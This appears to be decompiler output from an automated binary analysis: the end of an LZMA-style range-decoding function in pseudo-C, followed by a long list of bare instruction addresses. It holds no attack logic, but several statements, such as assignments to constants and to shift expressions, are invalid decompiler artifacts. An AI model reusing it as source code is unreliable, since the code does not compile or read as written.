									 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
									if( *(__ebp - 0x38) >= 4) {
										__eflags =  *(__ebp - 0x38) - 0xa;
										if( *(__ebp - 0x38) >= 0xa) {
											_t98 = __ebp - 0x38;
											 *_t98 =  *(__ebp - 0x38) - 6;
											__eflags =  *_t98;
										} else {
											 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
										}
									} else {
										 *(__ebp - 0x38) = 0;
									}
									__eflags =  *(__ebp - 0x34) - __edx;
									if( *(__ebp - 0x34) == __edx) {
										__ebx = 0;
										__ebx = 1;
										do {
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L59;
											} else {
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *((intOrPtr*)(__ebp - 0x88)) = 0xf;
													goto L155;
												} else {
													__ecx =  *(__ebp - 0x70);
													__eax =  *(__ebp - 0xc);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
													__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
													 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
													 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
													_t203 = __ebp - 0x70;
													 *_t203 =  *(__ebp - 0x70) + 1;
													__eflags =  *_t203;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
													goto L59;
												}
											}
											goto L157;
											L59:
											__eflags = __ebx - 0x100;
										} while (__ebx < 0x100);
										goto L55;
									} else {
										__eax =  *(__ebp - 0x14);
										__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
										__eflags = __eax -  *(__ebp - 0x74);
										if(__eax >=  *(__ebp - 0x74)) {
											__eax = __eax +  *(__ebp - 0x74);
											__eflags = __eax;
										}
										__ecx =  *(__ebp - 8);
										__ebx = 0;
										__ebx = 1;
										__al =  *((intOrPtr*)(__eax + __ecx));
										 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
										goto L41;
									}
								}
								goto L157;
							case 7:
								__eflags =  *(__ebp - 0x40) - 1;
								if( *(__ebp - 0x40) != 1) {
									__eax =  *(__ebp - 0x24);
									 *((intOrPtr*)(__ebp - 0x80)) = 0x16;
									 *(__ebp - 0x20) =  *(__ebp - 0x24);
									__eax =  *(__ebp - 0x28);
									 *(__ebp - 0x24) =  *(__ebp - 0x28);
									__eax =  *(__ebp - 0x2c);
									 *(__ebp - 0x28) =  *(__ebp - 0x2c);
									__eax = 0;
									__eflags =  *(__ebp - 0x38) - 7;
									0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
									__al = __al & 0x000000fd;
									__eax = (__eflags >= 0) - 1 + 0xa;
									 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x664;
									__eflags = __eax;
									 *(__ebp - 0x58) = __eax;
									goto L68;
								} else {
									__eax =  *(__ebp - 4);
									__ecx =  *(__ebp - 0x38);
									 *((intOrPtr*)(__ebp - 0x84)) = 8;
									__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
								}
								goto L121;
							case 8:
								__eflags =  *(__ebp - 0x40);
								if( *(__ebp - 0x40) != 0) {
									__eax =  *(__ebp - 4);
									__ecx =  *(__ebp - 0x38);
									 *((intOrPtr*)(__ebp - 0x84)) = 0xa;
									__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
								} else {
									__eax =  *(__ebp - 0x38);
									__ecx =  *(__ebp - 4);
									__eax =  *(__ebp - 0x38) + 0xf;
									 *((intOrPtr*)(__ebp - 0x84)) = 9;
									 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
									__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
								}
								goto L121;
							case 9:
								__eflags =  *(__ebp - 0x40);
								if( *(__ebp - 0x40) != 0) {
									goto L88;
								} else {
									__eflags =  *(__ebp - 0x60);
									if( *(__ebp - 0x60) == 0) {
										goto L156;
									} else {
										__eax = 0;
										__eflags =  *(__ebp - 0x38) - 7;
										0 |  *(__ebp - 0x38) - 0x00000007 >= 0x00000000 = ( *(__ebp - 0x38) - 7 >= 0) + ( *(__ebp - 0x38) - 7 >= 0) + 9;
										 *(__ebp - 0x38) = ( *(__ebp - 0x38) - 7 >= 0) + ( *(__ebp - 0x38) - 7 >= 0) + 9;
										__eflags =  *(__ebp - 0x64);
										if( *(__ebp - 0x64) == 0) {
											 *((intOrPtr*)(__ebp - 0x88)) = 0x1b;
											goto L155;
										} else {
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											goto L78;
										}
									}
								}
								goto L157;
							case 0xa:
								__eflags =  *(__ebp - 0x40);
								if( *(__ebp - 0x40) != 0) {
									__eax =  *(__ebp - 4);
									__ecx =  *(__ebp - 0x38);
									 *((intOrPtr*)(__ebp - 0x84)) = 0xb;
									__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								} else {
									__eax =  *(__ebp - 0x28);
									goto L87;
								}
								goto L121;
							case 0xb:
								__eflags =  *(__ebp - 0x40);
								if( *(__ebp - 0x40) != 0) {
									__ecx =  *(__ebp - 0x24);
									__eax =  *(__ebp - 0x20);
									 *(__ebp - 0x20) =  *(__ebp - 0x24);
								} else {
									__eax =  *(__ebp - 0x24);
								}
								__ecx =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								L87:
								__ecx =  *(__ebp - 0x2c);
								 *(__ebp - 0x2c) = __eax;
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								L88:
								__eax =  *(__ebp - 4);
								 *((intOrPtr*)(__ebp - 0x80)) = 0x15;
								__eax =  *(__ebp - 4) + 0xa68;
								 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
								L68:
								__esi =  *(__ebp - 0x58);
								 *((intOrPtr*)(__ebp - 0x84)) = 0x12;
								L121:
								 *(_t580 - 0x54) = _t573;
								goto L122;
							case 0xc:
								while(1) {
									L89:
									__eflags =  *(__ebp - 0x6c);
									if( *(__ebp - 0x6c) == 0) {
										break;
									}
									__ecx =  *(__ebp - 0x70);
									__eax =  *(__ebp - 0xc);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
									__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
									 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
									 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
									_t316 = __ebp - 0x70;
									 *_t316 =  *(__ebp - 0x70) + 1;
									__eflags =  *_t316;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
									__eax =  *(__ebp - 0x2c);
									while(1) {
										_t320 = __ebp - 0x48;
										 *_t320 =  *(__ebp - 0x48) - 1;
										__eflags =  *_t320;
										__eflags =  *(__ebp - 0x48);
										if( *(__ebp - 0x48) <= 0) {
											break;
										}
										__ecx =  *(__ebp - 0xc);
										__ebx = __ebx + __ebx;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
										__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
											__ecx =  *(__ebp - 0x10);
											 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
											__ebx = __ebx | 0x00000001;
											__eflags = __ebx;
											 *(__ebp - 0x44) = __ebx;
										}
										__eflags =  *(__ebp - 0x10) - 0x1000000;
										if( *(__ebp - 0x10) >= 0x1000000) {
											continue;
										} else {
											goto L89;
										}
										goto L157;
									}
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									while(1) {
										__eax =  *(__ebp - 0x40);
										__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
										if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
											break;
										}
										__eax =  *(__ebp - 0x50);
										 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
										__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
										__eax =  *(__ebp - 0x58);
										__esi = __edi + __eax;
										 *(__ebp - 0x54) = __esi;
										__ax =  *__esi;
										__ecx = __ax & 0x0000ffff;
										__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
										__eflags =  *(__ebp - 0xc) - __edx;
										if( *(__ebp - 0xc) >= __edx) {
											__ecx = 0;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
											__ecx = 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
											__ebx = 1;
											__ecx =  *(__ebp - 0x48);
											__ebx = 1 << __cl;
											__ecx = 1 << __cl;
											__ebx =  *(__ebp - 0x44);
											__ebx =  *(__ebp - 0x44) | __ecx;
											__cx = __ax;
											__cx = __ax >> 5;
											__eax = __eax - __ecx;
											__edi = __edi + 1;
											__eflags = __edi;
											 *(__ebp - 0x44) = __ebx;
											 *__esi = __ax;
											 *(__ebp - 0x50) = __edi;
										} else {
											 *(__ebp - 0x10) = __edx;
											0x800 = 0x800 - __ecx;
											0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
											 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
											 *__esi = __dx;
										}
										__eflags =  *(__ebp - 0x10) - 0x1000000;
										if( *(__ebp - 0x10) >= 0x1000000) {
											L101:
											_t350 = __ebp - 0x48;
											 *_t350 =  *(__ebp - 0x48) + 1;
											__eflags =  *_t350;
											continue;
										} else {
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *((intOrPtr*)(__ebp - 0x88)) = 0x10;
												goto L155;
											} else {
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t347 = __ebp - 0x70;
												 *_t347 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t347;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L101;
											}
										}
										goto L157;
									}
									_t373 = __ebp - 0x2c;
									 *_t373 =  *(__ebp - 0x2c) + __ebx;
									__eflags =  *_t373;
									_t375 = __ebp - 0x2c;
									 *_t375 =  *(__ebp - 0x2c) + 1;
									__eflags =  *_t375;
									__eax =  *(__ebp - 0x2c);
									__eflags = __eax;
									if(__eax == 0) {
										 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
										goto L155;
									} else {
										__eflags = __eax -  *(__ebp - 0x60);
										if(__eax >  *(__ebp - 0x60)) {
											goto L156;
										} else {
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
											__eax =  *(__ebp - 0x30);
											_t382 = __ebp - 0x60;
											 *_t382 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
											__eflags =  *_t382;
											while(1) {
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t396 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t396;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t396;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													goto L79;
												}
												goto L157;
											}
											 *((intOrPtr*)(__ebp - 0x88)) = 0x1c;
											goto L155;
										}
									}
									goto L157;
								}
								 *((intOrPtr*)(__ebp - 0x88)) = 0xc;
								goto L155;
							case 0xd:
								L37:
								__eflags =  *(__ebp - 0x6c);
								if( *(__ebp - 0x6c) == 0) {
									 *((intOrPtr*)(__ebp - 0x88)) = 0xd;
									goto L155;
								} else {
									__ecx =  *(__ebp - 0x70);
									__eax =  *(__ebp - 0xc);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
									__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
									 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
									 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
									_t122 = __ebp - 0x70;
									 *_t122 =  *(__ebp - 0x70) + 1;
									__eflags =  *_t122;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
									L39:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
										while(1) {
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t170 = __edx + 1; // 0x1
												__ebx = _t170;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												continue;
											} else {
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *((intOrPtr*)(__ebp - 0x88)) = 0xe;
													goto L155;
												} else {
													__ecx =  *(__ebp - 0x70);
													__eax =  *(__ebp - 0xc);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
													__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
													 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
													 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
													_t156 = __ebp - 0x70;
													 *_t156 =  *(__ebp - 0x70) + 1;
													__eflags =  *_t156;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
													continue;
												}
											}
											goto L157;
										}
										goto L54;
									} else {
										__eflags = __ebx - 0x100;
										if(__ebx >= 0x100) {
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											L55:
											__al =  *(__ebp - 0x44);
											 *(__ebp - 0x5c) =  *(__ebp - 0x44);
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *((intOrPtr*)(__ebp - 0x88)) = 0x1a;
												goto L155;
											} else {
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												L78:
												 *(__ebp - 0x14) = __edx;
												L79:
												 *((intOrPtr*)(__ebp - 0x88)) = 2;
												goto L1;
											}
										} else {
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										}
									}
								}
								goto L157;
						}
					}
					L156:
					_t503 = _t502 | 0xffffffff;
				}
				L157:
				return _t503;
			}

0x00406d5f
0x00406d84
0x00406d8e
0x00000000
0x00406d61
0x00406d61
0x00406d64
0x00406d68
0x00406d6b
0x00406d6e
0x00406d72
0x00406d75
0x00406e4f
0x00406e56
0x00406e59
0x00406e60
0x00406e8d
0x00406e91
0x00000000
0x00000000
0x00406e93
0x00406e99
0x00406e9c
0x00406e9f
0x00406ea2
0x00406ea5
0x00406ea8
0x00406eab
0x00406eae
0x00406eb4
0x00406ecd
0x00406ed0
0x00406ed3
0x00406ed6
0x00406eda
0x00406edc
0x00406edd
0x00406ee0
0x00406eb6
0x00406eb6
0x00406ebe
0x00406ec3
0x00406ec5
0x00406ec8
0x00406ec8
0x00406eea
0x00406e8a
0x00406e8a
0x00406e8a
0x00000000
0x00406eec
0x00406e69
0x00406fa1
0x00406fab
0x00406fb3
0x00406fba
0x00406fbc
0x00406e6f
0x00406e6f
0x00406e72
0x00406e75
0x00406e79
0x00406e7c
0x00406e82
0x00406e84
0x00406e84
0x00406e87
0x00000000
0x00406e87
0x00406e69
0x00000000
0x00406eea
0x00406ef1
0x00406ef4
0x00406ef9
0x00406efa
0x00406efc
0x00406efe
0x00406f01
0x00406e0d
0x00406e0d
0x004065a9
0x004065a9
0x004065a9
0x004065b2
0x00000000
0x00000000
0x004065b8
0x00000000
0x004065c3
0x00000000
0x004065c9
0x004065cc
0x004065cf
0x004065d2
0x004065d6
0x00000000
0x004065dc
0x004065dc
0x004065df
0x004065e1
0x004065e2
0x004065e5
0x004065e7
0x004065e8
0x004065ea
0x004065ed
0x004065f2
0x004065f7
0x00406600
0x00406613
0x00406616
0x00406622
0x0040664a
0x0040664c
0x0040664e
0x00406651
0x00406652
0x00406652
0x0040664e
0x0040665a
0x0040665e
0x00000000
0x00406624
0x00406628
0x0040662d
0x0040662d
0x00406636
0x0040663e
0x00406641
0x00000000
0x00406647
0x00406647
0x00000000
0x00406647
0x00406641
0x00406622
0x004065d6
0x00000000
0x00000000
0x00406664
0x00406664
0x00406668
0x00406f14
0x00000000
0x0040666e
0x00406671
0x00406681
0x00406684
0x00406687
0x00406687
0x00406687
0x0040668a
0x0040668e
0x00000000
0x00406690
0x00406690
0x00406696
0x004066c0
0x004066c6
0x004066cd
0x00000000
0x00406698
0x0040669c
0x0040669f
0x004066a4
0x004066a4
0x004066af
0x004066b7
0x004066ba
0x00000000
0x00000000
0x00000000
0x00000000
0x004066ba
0x00406696
0x0040668e
0x00000000
0x00000000
0x004066ff
0x00406705
0x00406708
0x00406715
0x0040671d
0x00000000
0x00000000
0x004066d4
0x004066d4
0x004066d8
0x00406f23
0x00000000
0x004066de
0x004066e4
0x004066ef
0x004066ef
0x004066ef
0x004066f2
0x004066f5
0x004066f8
0x004066fd
0x00000000
0x00000000
0x00000000
0x00000000
0x004066fd
0x00000000
0x00000000
0x00406d94
0x00406d94
0x00406d9a
0x00406da0
0x00406da6
0x00406dc0
0x00406dc3
0x00406dc9
0x00406dd4
0x00406dd4
0x00406dd6
0x00406da8
0x00406da8
0x00406db7
0x00406dbb
0x00406dbb
0x00406de0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406de2
0x00406de6
0x00406f95
0x00000000
0x00406dec
0x00406df2
0x00406df9
0x00406e01
0x00406e04
0x00406e07
0x00406e07
0x00000000
0x00406e07
0x00000000
0x00000000
0x00406725
0x00406727
0x0040672a
0x0040679b
0x0040679e
0x004067a1
0x004067a8
0x004067b2
0x00000000
0x0040672c
0x0040672c
0x00406730
0x00406733
0x00406735
0x00406738
0x0040673b
0x0040673d
0x00406740
0x00406742
0x00406747
0x0040674a
0x0040674d
0x00406751
0x00406758
0x0040675b
0x00406762
0x00406766
0x0040676e
0x0040676e
0x0040676e
0x00406768
0x00406768
0x00406768
0x0040675d
0x0040675d
0x0040675d
0x00406772
0x00406775
0x00406793
0x00406795
0x00406968
0x00406968
0x0040696b
0x0040696e
0x00406971
0x00406974
0x00406977
0x0040697a
0x0040697d
0x00406980
0x00406983
0x00406986
0x0040699e
0x004069a1
0x004069a4
0x004069a7
0x004069a7
0x004069aa
0x004069ae
0x004069b0
0x00406988
0x00406988
0x00406990
0x00406995
0x00406997
0x00406999
0x00406999
0x004069b3
0x004069ba
0x004069bd
0x00000000
0x004069bf
0x0040693b
0x0040693f
0x00406f47
0x00000000
0x00406945
0x00406945
0x00406948
0x0040694b
0x0040694f
0x00406952
0x00406958
0x0040695a
0x0040695a
0x0040695a
0x0040695d
0x00000000
0x0040695d
0x0040693f
0x00000000
0x00406960
0x00406960
0x00406960
0x00000000
0x00406777
0x00406777
0x0040677a
0x0040677d
0x00406780
0x00406782
0x00406782
0x00406782
0x00406785
0x00406788
0x0040678a
0x0040678b
0x0040678e
0x00000000
0x0040678e
0x00406775
0x00000000
0x00000000
0x004069c4
0x004069c8
0x004069e6
0x004069e9
0x004069f0
0x004069f3
0x004069f6
0x004069f9
0x004069fc
0x004069ff
0x00406a01
0x00406a08
0x00406a09
0x00406a0b
0x00406a0e
0x00406a11
0x00406a14
0x00406a14
0x00406a19
0x00000000
0x004069ca
0x004069ca
0x004069cd
0x004069d0
0x004069da
0x004069da
0x00000000
0x00000000
0x00406a2e
0x00406a32
0x00406a55
0x00406a58
0x00406a5b
0x00406a65
0x00406a34
0x00406a34
0x00406a37
0x00406a3a
0x00406a3d
0x00406a4a
0x00406a4d
0x00406a4d
0x00000000
0x00000000
0x00406a71
0x00406a75
0x00000000
0x00406a7b
0x00406a7b
0x00406a7f
0x00000000
0x00406a85
0x00406a85
0x00406a87
0x00406a8e
0x00406a92
0x00406a95
0x00406a99
0x00406f5f
0x00000000
0x00406a9f
0x00406a9f
0x00406aa2
0x00406aa5
0x00406aa8
0x00406aaa
0x00406aaa
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abd
0x00406abf
0x00406abf
0x00406abf
0x00406ac2
0x00406ac5
0x00406ac8
0x00406acb
0x00406acb
0x00406acb
0x00406ace
0x00000000
0x00406ace
0x00406a99
0x00406a7f
0x00000000
0x00000000
0x00406ae2
0x00406ae6
0x00406aed
0x00406af0
0x00406af3
0x00406afd
0x00406ae8
0x00406ae8
0x00000000
0x00406ae8
0x00000000
0x00000000
0x00406b09
0x00406b0d
0x00406b14
0x00406b17
0x00406b1a
0x00406b0f
0x00406b0f
0x00406b0f
0x00406b1d
0x00406b20
0x00406b23
0x00406b23
0x00406b26
0x00406b29
0x00406b2c
0x00406b2c
0x00406b2f
0x00406b36
0x00406b3b
0x00406a1c
0x00406a1c
0x00406a1f
0x00406d91
0x00406d91
0x00000000
0x00000000
0x00406bc9
0x00406bc9
0x00406bc9
0x00406bcd
0x00000000
0x00000000
0x00406bd3
0x00406bd6
0x00406bd9
0x00406bdd
0x00406be0
0x00406be6
0x00406be8
0x00406be8
0x00406be8
0x00406beb
0x00406bee
0x00406bf1
0x00406bf1
0x00406bf1
0x00406bf1
0x00406bf4
0x00406bf8
0x00000000
0x00000000
0x00406bfa
0x00406bfd
0x00406bff
0x00406c02
0x00406c05
0x00406c08
0x00406c0a
0x00406c0d
0x00406c10
0x00406c10
0x00406c13
0x00406c13
0x00406c16
0x00406c1d
0x00000000
0x00406c1f
0x00000000
0x00406c1f
0x00000000
0x00406c1d
0x00406c24
0x00406c26
0x00406c2d
0x00406c30
0x00406c33
0x00406c33
0x00406c38
0x00406c3a
0x00406c3d
0x00406c44
0x00406c47
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00000000
0x00000000
0x00406c7c
0x00406c82
0x00406c85
0x00406c88
0x00406c8b
0x00406c8e
0x00406c91
0x00406c94
0x00406c97
0x00406c9a
0x00406c9d
0x00406cb6
0x00406cb8
0x00406cbb
0x00406cbc
0x00406cbf
0x00406cc1
0x00406cc4
0x00406cc6
0x00406cc8
0x00406ccb
0x00406ccd
0x00406cd0
0x00406cd4
0x00406cd6
0x00406cd6
0x00406cd7
0x00406cda
0x00406cdd
0x00406c9f
0x00406c9f
0x00406ca7
0x00406cac
0x00406cae
0x00406cb1
0x00406cb1
0x00406ce0
0x00406ce7
0x00406c71
0x00406c71
0x00406c71
0x00406c71
0x00000000
0x00406ce9
0x00406c4c
0x00406c50
0x00406f77
0x00000000
0x00406c56
0x00406c56
0x00406c59
